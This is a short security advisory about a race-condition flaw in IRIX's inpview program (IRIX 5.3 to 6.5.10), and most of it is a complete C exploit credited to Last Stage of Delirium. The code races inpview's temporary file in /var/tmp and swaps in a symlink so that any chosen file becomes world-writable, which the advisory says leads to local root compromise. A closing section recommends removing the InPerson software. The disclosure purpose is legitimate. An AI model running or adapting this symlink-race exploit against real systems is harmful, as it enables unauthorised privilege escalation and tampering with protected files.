COMMAND

    inpview

SYSTEMS AFFECTED

    IRIX 5.3...6.5.10

PROBLEM

    There  exists  a  race  condition  vulnerability  in  the  inpview
    program.   When appropriately  exploited it  can lead  to a  local
    root compromise on a vulnerable system.  Found by LSD.

    /*## copyright LAST STAGE OF DELIRIUM jan 2000 poland        *://lsd-pl.net/ #*/
    /*## /usr/lib/InPerson/inpview                                               #*/

    /*   sets rw-rw-rw permissions                                                */

    #include <sys/types.h>
    #include <dirent.h>
    #include <stdio.h>

    main(int argc,char **argv){
        DIR *dirp;struct dirent *dentp;

        printf("copyright LAST STAGE OF DELIRIUM jan 2000 poland  //lsd-pl.net/\n");
        printf("/usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all\n\n");

        if(argc!=2){
            printf("usage: %s file\n",argv[0]);
            exit(-1);
        }

        if(!fork()){
            nice(-20);sleep(2);close(0);close(1);close(2);
            execle("/usr/lib/InPerson/inpview","lsd",0,0);
        }

        printf("looking for temporary file... ");fflush(stdout);
        chdir("/var/tmp");
        dirp=opendir(".");
        while(1){
            if((dentp=readdir(dirp))==NULL) {rewinddir(dirp);continue;}
            if(!strncmp(dentp->d_name,".ilmpAAA",8)) break;
        }
        closedir(dirp);
        printf("found!\n");
        while(1){
            if(!symlink(argv[1],dentp->d_name)) break;
        }
        sleep(2);
        unlink(dentp->d_name);

        execl("/bin/ls","ls","-l",argv[1],0);
    }

SOLUTION

    No  SGI  patches   are  currently  available   for  the   InPerson
    application.   Please  remove  the  InPerson  software  from  your
    system.  InPerson functionality has been replaced with  SGImeeting
    which  is   compatible  with   Microsoft  NetMeeting,   PictureTel
    LiveShare Plus,  SunForum, HP  Visual Conference  and other  T.120
    compliant clients.